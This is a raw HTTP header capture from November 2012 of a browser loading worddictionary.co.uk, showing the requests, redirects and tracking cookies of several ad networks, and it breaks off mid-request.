Set-Cookie: uuid2=5858721859426781856; path=/; expires=Wed, 06-Feb-2013 19:29:17 GMT; domain=.adnxs.com; HttpOnly sess=1; path=/; expires=Fri, 09-Nov-2012 19:29:17 GMT; domain=.adnxs.com; HttpOnly icu=ChIImNsIEAoYASABKAEwjZDwhAUQjZDwhAUYAA..; path=/; expires=Wed, 06-Feb-2013 19:29:17 GMT; domain=.adnxs.com; HttpOnly anj=Kfu=8fG3x=Cxrx)0s]#%2L_'x%SEV/hnKu94FSnBvk$$qk[$u)3b1xV!aDG6f6$RuQ6'wF.&lt;LF$; path=/; expires=Wed, 06-Feb-2013 19:29:17 GMT; domain=.adnxs.com; HttpOnly
Date: Thu, 08 Nov 2012 19:29:17 GMT
Content-Length: 846
GET /product-tb/v1/theme/afg.css HTTP/1.1

Host: s1.affinitymatrix.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://worddictionary.co.uk/?utm_source=cb&amp;utm_medium=cb&amp;utm_campaign=cb2
HTTP/1.1 200 OK

Content-Type: text/css
Server: nginx
Date: Thu, 08 Nov 2012 19:29:16 GMT
Last-Modified: Thu, 05 Apr 2012 09:39:19 GMT
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
Content-Encoding: gzip
GET /bn.js?pid=knw79&rnd=11319507206 HTTP/1.1

Host: ip.ph.affinity.com
GET /bn.js?pid=knw79&amp;rnd=11319507206 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://worddictionary.co.uk/static//inpage-affinity/knw79.html
HTTP/1.1 200 OK

Content-Type: application/javascript
Server: nginx/1.2.1
Date: Thu, 08 Nov 2012 19:29:16 GMT
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/5.3.6
Expires: Sun, 09 Dec 2012 19:29:16 GMT
Cache-Control: max-age=2678400
GET /static//css/arrow.gif HTTP/1.1

Host: worddictionary.co.uk

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://worddictionary.co.uk/static//css/stylesheet.css
Cookie: ref=http%3A%2F%2Fclicks.affectsearch.com%2Ffly%3Fq%3DSecurity%2BCameras%26enk%3DJrGGuSa5j6GPiY%2BpRrHGoY%2BJZqlGoQaRJ6lG4ybjRg%3D%3D
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Thu, 08 Nov 2012 19:29:17 GMT
Server: Apache
Last-Modified: Fri, 25 Feb 2011 09:35:38 GMT
Etag: &quot;2feab-a4-d7e4e80&quot;
Accept-Ranges: bytes
Content-Length: 164
Connection: close
GET /adcount/3.0/5359/2462296/0/225/AdId=3438492;BnId=4;ct=3654511382;st=1923;adcid=1;itime=402956279;reqtype=5;;kvuniqimp=r3:222ffno28509c080c45ad83%2E35548412;kvafseq=1 HTTP/1.1

Host: adnet.affinity.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://worddictionary.co.uk/?utm_source=cb&amp;utm_medium=cb&amp;utm_campaign=cb2
HTTP/1.0 200 OK

Content-Type: application/x-javascript
Cache-Control: no-cache
Content-Length: 1
Connection: keep-alive
GET /p/04/3e/16/58/043e16586e34537547742001edf1b41a.gif HTTP/1.1

Host: cdn.adnxs.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://worddictionary.co.uk/?utm_source=cb&amp;utm_medium=cb&amp;utm_campaign=cb2
Cookie: uuid2=5858721859426781856; anj=Kfu=8fG3x=Cxrx)0s]#%2L_'x%SEV/hnKu94FSnBvk$$qk[$u)3b1xV!aDG6f6$RuQ6'wF.&lt;LF$; sess=1; icu=ChIImNsIEAoYASABKAEwjZDwhAUQjZDwhAUYAA..
HTTP/1.1 200 OK

Content-Type: image/gif
Server: Apache
Etag: &quot;043e16586e34537547742001edf1b41a:1343152693&quot;
Last-Modified: Tue, 24 Jul 2012 17:58:12 GMT
Accept-Ranges: bytes
Content-Length: 27998
Date: Thu, 08 Nov 2012 19:29:17 GMT
Connection: keep-alive
GET /IFR_TB2_WEB.html HTTP/1.1

Host: backfill.ph.affinity.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://worddictionary.co.uk/?utm_source=cb&amp;utm_medium=cb&amp;utm_campaign=cb2
Cookie: PHUU=803093fc02080839d9057141d44daea6
HTTP/1.1 200 OK

Content-Type: text/html
Server: nginx
Date: Thu, 08 Nov 2012 19:29:16 GMT
Content-Length: 568
Last-Modified: Mon, 22 Oct 2012 09:55:00 GMT
Connection: keep-alive
Expires: Sun, 09 Dec 2012 19:29:16 GMT
Cache-Control: max-age=2678400
Accept-Ranges: bytes
GET /bn.js?pid=zsa52&rnd=97887066267 HTTP/1.1

Host: ip.ph.affinity.com
GET /bn.js?pid=zsa52&amp;rnd=97887066267 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://worddictionary.co.uk/static//inpage-affinity/zsa52.html
Cookie: PHUU=803093fc02080839d9057141d44daea6
HTTP/1.1 200 OK

Content-Type: application/javascript
Server: nginx/1.2.1
Date: Thu, 08 Nov 2012 19:29:17 GMT
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/5.3.6
Expires: Sun, 09 Dec 2012 19:29:17 GMT
Cache-Control: max-age=2678400
GET /bn.js?pid=xxz97&rnd=105649356933 HTTP/1.1

Host: ip.ph.affinity.com
GET /bn.js?pid=xxz97&amp;rnd=105649356933 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://worddictionary.co.uk/static//inpage-affinity/xxz97.html
Cookie: PHUU=803093fc02080839d9057141d44daea6
HTTP/1.1 200 OK

Content-Type: application/javascript
Server: nginx/1.2.1
Date: Thu, 08 Nov 2012 19:29:16 GMT
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/5.3.6
Expires: Sun, 09 Dec 2012 19:29:16 GMT
Cache-Control: max-age=2678400
GET /bn.js?pid=djs28&rnd=106548815638 HTTP/1.1

Host: ip.ph.affinity.com
GET /bn.js?pid=djs28&amp;rnd=106548815638 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://worddictionary.co.uk/static//inpage-affinity/djs28.html
Cookie: PHUU=803093fc02080839d9057141d44daea6
HTTP/1.1 200 OK

Content-Type: application/javascript
Server: nginx/1.2.1
Date: Thu, 08 Nov 2012 19:29:16 GMT
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/5.3.6
Expires: Sun, 09 Dec 2012 19:29:16 GMT
Cache-Control: max-age=2678400
GET /sr.js?rnd=135240295688&pid=knw79&rf=http%3A//worddictionary.co.uk/%3Futm_source%3Dcb%26utm_medium%3Dcb%26utm_campaign%3Dcb2 HTTP/1.1

Host: ip.ph.affinity.com
GET /sr.js?rnd=135240295688&amp;pid=knw79&amp;rf=http%3A//worddictionary.co.uk/%3Futm_source%3Dcb%26utm_medium%3Dcb%26utm_campaign%3Dcb2 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://worddictionary.co.uk/static//inpage-affinity/knw79.html
Cookie: PHUU=803093fc02080839d9057141d44daea6
HTTP/1.1 200 OK

Content-Type: application/javascript
Server: nginx/1.2.1
Date: Thu, 08 Nov 2012 19:29:17 GMT
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/5.3.6
X-RefToUse: http://worddictionary.co.uk/?utm_source=cb&amp;utm_medium=cb&amp;utm_campaign=cb2
X-Context-Off: 0
Expires: Sun, 09 Dec 2012 19:29:17 GMT
Cache-Control: max-age=2678400
GET /jlibs/aj-tb.js HTTP/1.1

Host: s1.affinitymatrix.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://worddictionary.co.uk/?utm_source=cb&amp;utm_medium=cb&amp;utm_campaign=cb2
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Server: nginx
Date: Thu, 08 Nov 2012 19:29:16 GMT
Last-Modified: Thu, 11 Oct 2012 12:14:41 GMT
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
Content-Encoding: gzip
GET /tb/v1/theme/fg_affinity-logo-wb.png HTTP/1.1

Host: s1.affinitymatrix.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://worddictionary.co.uk/?utm_source=cb&amp;utm_medium=cb&amp;utm_campaign=cb2
HTTP/1.1 200 OK

Content-Type: image/png
Server: nginx
Date: Thu, 08 Nov 2012 19:29:16 GMT
Content-Length: 859
Last-Modified: Mon, 30 Jan 2012 10:18:39 GMT
Connection: close
Accept-Ranges: bytes
GET /sr.js?rnd=135240295723&pid=zsa52&rf=http%3A//worddictionary.co.uk/%3Futm_source%3Dcb%26utm_medium%3Dcb%26utm_campaign%3Dcb2 HTTP/1.1

Host: ip.ph.affinity.com
GET /sr.js?rnd=135240295723&amp;pid=zsa52&amp;rf=http%3A//worddictionary.co.uk/%3Futm_source%3Dcb%26utm_medium%3Dcb%26utm_campaign%3Dcb2 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://worddictionary.co.uk/static//inpage-affinity/zsa52.html
Cookie: PHUU=803093fc02080839d9057141d44daea6
HTTP/1.1 200 OK

Content-Type: application/javascript
Server: nginx/1.2.1
Date: Thu, 08 Nov 2012 19:29:16 GMT
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/5.3.6
X-RefToUse: http://worddictionary.co.uk/?utm_source=cb&amp;utm_medium=cb&amp;utm_campaign=cb2
X-Context-Off: 0
Expires: Sun, 09 Dec 2012 19:29:16 GMT
Cache-Control: max-age=2678400
GET /sr.js?rnd=13524029566&pid=djs28&rf=http%3A//worddictionary.co.uk/%3Futm_source%3Dcb%26utm_medium%3Dcb%26utm_campaign%3Dcb2 HTTP/1.1

Host: ip.ph.affinity.com
GET /sr.js?rnd=13524029566&amp;pid=djs28&amp;rf=http%3A//worddictionary.co.uk/%3Futm_source%3Dcb%26utm_medium%3Dcb%26utm_campaign%3Dcb2 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://worddictionary.co.uk/static//inpage-affinity/djs28.html
Cookie: PHUU=803093fc02080839d9057141d44daea6
HTTP/1.1 200 OK

Content-Type: application/javascript
Server: nginx/1.2.1
Date: Thu, 08 Nov 2012 19:29:17 GMT
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/5.3.6
X-RefToUse: http://worddictionary.co.uk/?utm_source=cb&amp;utm_medium=cb&amp;utm_campaign=cb2
X-Context-Off: 0
Expires: Sun, 09 Dec 2012 19:29:17 GMT
Cache-Control: max-age=2678400
GET /sr.js?rnd=135240295696&pid=xxz97&rf=http%3A//worddictionary.co.uk/%3Futm_source%3Dcb%26utm_medium%3Dcb%26utm_campaign%3Dcb2 HTTP/1.1

Host: ip.ph.affinity.com
GET /sr.js?rnd=135240295696&amp;pid=xxz97&amp;rf=http%3A//worddictionary.co.uk/%3Futm_source%3Dcb%26utm_medium%3Dcb%26utm_campaign%3Dcb2 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://worddictionary.co.uk/static//inpage-affinity/xxz97.html
Cookie: PHUU=803093fc02080839d9057141d44daea6
HTTP/1.1 200 OK

Content-Type: application/javascript
Server: nginx/1.2.1
Date: Thu, 08 Nov 2012 19:29:17 GMT
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/5.3.6
X-RefToUse: http://worddictionary.co.uk/?utm_source=cb&amp;utm_medium=cb&amp;utm_campaign=cb2
X-Context-Off: 0
Expires: Sun, 09 Dec 2012 19:29:17 GMT
Cache-Control: max-age=2678400
GET /addyn/3.0/5359.1/2462298/0/225/ADTECH;loc=100;cookie=info;target=_blank;key=;grp=[group];misc=c04c256fa8714cf4a49319838fb941cb;rdclick=;kvuniqimp=c04c256fa8714cf4a49319838fb941cb;kvafseq=1 HTTP/1.1

Host: adnet.affinity.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://worddictionary.co.uk/static//inpage-affinity/knw79.html
HTTP/1.0 302 Moved Temporarily

HTTP/1.0 302 Moved Temporarily
Connection: keep-alive
P3P: CP=&quot;NOI DSP DEVa OUR BUS UNI COM NAV INT&quot;
Cache-Control: no-cache
Location: http://adnet.affinity.com/addyn/3.0/5359.1/2462298/0/225/ADTECH;cfp=1;rndc=1352402956;loc=100;cookie=info;target=_blank;key=;grp=[group];misc=c04c256fa8714cf4a49319838fb941cb;rdclick=;kvuniqimp=c04c256fa8714cf4a49319838fb941cb;kvafseq=1
Content-Length: 0
Set-Cookie: CfP=1;domain=affinity.com;path=/
GET /cms/v1?esig=1~17e68b1b86afcfd8436104fe567484ccc2161b0f&nwid=10000602235&sigv=1 HTTP/1.1

Host: ad.yieldmanager.com
GET /cms/v1?esig=1~17e68b1b86afcfd8436104fe567484ccc2161b0f&amp;nwid=10000602235&amp;sigv=1 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://worddictionary.co.uk/?utm_source=cb&amp;utm_medium=cb&amp;utm_campaign=cb2
HTTP/1.1 302 Found

Content-Type: text/plain; charset=utf-8
Date: Thu, 08 Nov 2012 19:29:17 GMT
P3P: policyref=&quot;http://p3p.yahoo.com/w3c/p3p.xml&quot;, CP=&quot;CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV&quot;
Location: http://ib.adnxs.com/ymapuid?xid=E0
Cache-Control: private
Age: 0
Transfer-Encoding: chunked
Connection: keep-alive
Server: YTS/1.20.13
GET /static/images/loadingAnimation.gif HTTP/1.1

Host: worddictionary.co.uk

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://worddictionary.co.uk/?utm_source=cb&amp;utm_medium=cb&amp;utm_campaign=cb2
Cookie: ref=http%3A%2F%2Fclicks.affectsearch.com%2Ffly%3Fq%3DSecurity%2BCameras%26enk%3DJrGGuSa5j6GPiY%2BpRrHGoY%2BJZqlGoQaRJ6lG4ybjRg%3D%3D; __utma=37969189.1263011376.1352402957.1352402957.1352402957.1; __utmb=37969189.1.10.1352402957; __utmc=37969189; __utmz=37969189.1352402957.1.1.utmcsr=cb|utmccn=cb2|utmcmd=cb
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Thu, 08 Nov 2012 19:29:17 GMT
Server: Apache
Last-Modified: Fri, 25 Feb 2011 09:35:38 GMT
Etag: &quot;2fee4-16fe-d7e4e80&quot;
Accept-Ranges: bytes
Content-Length: 5886
Connection: close
GET /ymapuid?xid=E0 HTTP/1.1

Host: ib.adnxs.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://worddictionary.co.uk/?utm_source=cb&amp;utm_medium=cb&amp;utm_campaign=cb2
Cookie: uuid2=5858721859426781856; anj=Kfu=8fG3x=Cxrx)0s]#%2L_'x%SEV/hnKu94FSnBvk$$qk[$u)3b1xV!aDG6f6$RuQ6'wF.&lt;LF$; sess=1; icu=ChIImNsIEAoYASABKAEwjZDwhAUQjZDwhAUYAA..
HTTP/1.1 200 OK

Content-Type: text/html; charset=ISO-8859-1
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref=&quot;http://cdn.adnxs.com/w3c/policy/p3p.xml&quot;, CP=&quot;NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE&quot;
X-XSS-Protection: 0
Set-Cookie: uuid2=5858721859426781856; path=/; expires=Wed, 06-Feb-2013 19:29:17 GMT; domain=.adnxs.com; HttpOnly sess=1; path=/; expires=Fri, 09-Nov-2012 19:29:17 GMT; domain=.adnxs.com; HttpOnly uuid2=5858721859426781856; path=/; expires=Wed, 06-Feb-2013 19:29:17 GMT; domain=.adnxs.com; HttpOnly
Date: Thu, 08 Nov 2012 19:29:17 GMT
Content-Length: 0
GET /addyn/3.0/5359.1/2462298/0/225/ADTECH;cfp=1;rndc=1352402956;loc=100;cookie=info;target=_blank;key=;grp=[group];misc=c04c256fa8714cf4a49319838fb941cb;rdclick=;kvuniqimp=c04c256fa8714cf4a49319838fb941cb;kvafseq=1 HTTP/1.1

Host: adnet.affinity.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://worddictionary.co.uk/static//inpage-affinity/knw79.html
Cookie: CfP=1
HTTP/1.0 200 OK

Content-Type: application/x-javascript
Connection: keep-alive
Server: Adtech Adserver
Cache-Control: no-cache
P3P: CP=&quot;NOI DSP DEVa OUR BUS UNI COM NAV INT&quot;
Content-Length: 438
Set-Cookie: JEB2=509C014D6E651A59D48D8D35F0024347;expires=Sat, 8 Nov 2014 19:29:17 GMT;domain=affinity.com;path=/
GET /ttj?id=931097 HTTP/1.1

Host: adpx.metanetwork.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://worddictionary.co.uk/static//inpage-affinity/knw79.html
HTTP/1.1 302 Found

Content-Type: text/html; charset=ISO-8859-1
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref=&quot;http://cdn.adnxs.com/w3c/policy/p3p.xml&quot;, CP=&quot;NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE&quot;
X-XSS-Protection: 0
Location: http://ib.adnxs.com/ttj?id=931097
Date: Thu, 08 Nov 2012 19:29:17 GMT
Content-Length: 0
GET /addyn/3.0/5359.1/2525344/0/225/ADTECH;loc=100;cookie=info;target=_blank;key=;grp=[group];misc=1ba1c8f0058f49648c0efc3680e7e9a7;rdclick=;kvuniqimp=1ba1c8f0058f49648c0efc3680e7e9a7;kvafseq=1 HTTP/1.1

Host: adnet.affinity.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://worddictionary.co.uk/static//inpage-affinity/zsa52.html
HTTP/1.0 302 Moved Temporarily

HTTP/1.0 302 Moved Temporarily
Connection: keep-alive
P3P: CP=&quot;NOI DSP DEVa OUR BUS UNI COM NAV INT&quot;
Cache-Control: no-cache
Location: http://adnet.affinity.com/addyn/3.0/5359.1/2525344/0/225/ADTECH;cfp=1;rndc=1352402957;loc=100;cookie=info;target=_blank;key=;grp=[group];misc=1ba1c8f0058f49648c0efc3680e7e9a7;rdclick=;kvuniqimp=1ba1c8f0058f49648c0efc3680e7e9a7;kvafseq=1
Content-Length: 0
Set-Cookie: CfP=1;domain=affinity.com;path=/
GET /addyn/3.0/5359.1/2525343/0/170/ADTECH;loc=100;cookie=info;target=_blank;key=;grp=[group];misc=94d598502bac4b559a899e4aa10d9383;rdclick=;kvuniqimp=94d598502bac4b559a899e4aa10d9383;kvafseq=1 HTTP/1.1

Host: adnet.affinity.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://worddictionary.co.uk/static//inpage-affinity/xxz97.html
HTTP/1.0 302 Moved Temporarily

HTTP/1.0 302 Moved Temporarily
Connection: keep-alive
P3P: CP=&quot;NOI DSP DEVa OUR BUS UNI COM NAV INT&quot;
Cache-Control: no-cache
Location: http://adnet.affinity.com/addyn/3.0/5359.1/2525343/0/170/ADTECH;cfp=1;rndc=1352402956;loc=100;cookie=info;target=_blank;key=;grp=[group];misc=94d598502bac4b559a899e4aa10d9383;rdclick=;kvuniqimp=94d598502bac4b559a899e4aa10d9383;kvafseq=1
Content-Length: 0
Set-Cookie: CfP=1;domain=affinity.com;path=/
GET /adcount/3.0/5359/2462298/0/225/AdId=3362529;BnId=4;ct=3655405548;st=2496;adcid=1;itime=402957764;reqtype=5;;kvuniqimp=c04c256fa8714cf4a49319838fb941cb;kvafseq=1 HTTP/1.1

Host: adnet.affinity.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://worddictionary.co.uk/static//inpage-affinity/knw79.html
Cookie: CfP=1; JEB2=509C014D6E651A59D48D8D35F0024347
HTTP/1.0 200 OK

Content-Type: application/x-javascript
Connection: keep-alive
Cache-Control: no-cache
Content-Length: 1
GET /ttj?id=931097 HTTP/1.1

Host: ib.adnxs.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://worddictionary.co.uk/static//inpage-affinity/knw79.html
Cookie: uuid2=5858721859426781856; anj=Kfu=8fG3x=Cxrx)0s]#%2L_'x%SEV/hnKu94FSnBvk$$qk[$u)3b1xV!aDG6f6$RuQ6'wF.&lt;LF$; sess=1; icu=ChIImNsIEAoYASABKAEwjZDwhAUQjZDwhAUYAA..
HTTP/1.1 200 OK

Content-Type: text/javascript
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref=&quot;http://cdn.adnxs.com/w3c/policy/p3p.xml&quot;, CP=&quot;NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE&quot;
X-XSS-Protection: 0
Set-Cookie: uuid2=5858721859426781856; path=/; expires=Wed, 06-Feb-2013 19:29:17 GMT; domain=.adnxs.com; HttpOnly sess=1; path=/; expires=Fri, 09-Nov-2012 19:29:17 GMT; domain=.adnxs.com; HttpOnly icu=ChIImNsIEAoYAiACKAIwjZDwhAUQjZDwhAUYAQ..; path=/; expires=Wed, 06-Feb-2013 19:29:17 GMT; domain=.adnxs.com; HttpOnly anj=Kfu=8fG68%Cxrx)0s]#%2L_'x%SEV/hnJPh4FSnBvk$$qk[$u)3b1xV!aGh[WNFD')WKrNw+fmn4H2rU8-CO^; path=/; expires=Wed, 06-Feb-2013 19:29:17 GMT; domain=.adnxs.com; HttpOnly
Date: Thu, 08 Nov 2012 19:29:17 GMT
Content-Length: 759
GET /addyn/3.0/5359.1/2462299/0/170/ADTECH;loc=100;cookie=info;target=_blank;key=;grp=[group];misc=99019805cf7d4f70a346c81cf77a1a22;rdclick=;kvuniqimp=99019805cf7d4f70a346c81cf77a1a22;kvafseq=1 HTTP/1.1

Host: adnet.affinity.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
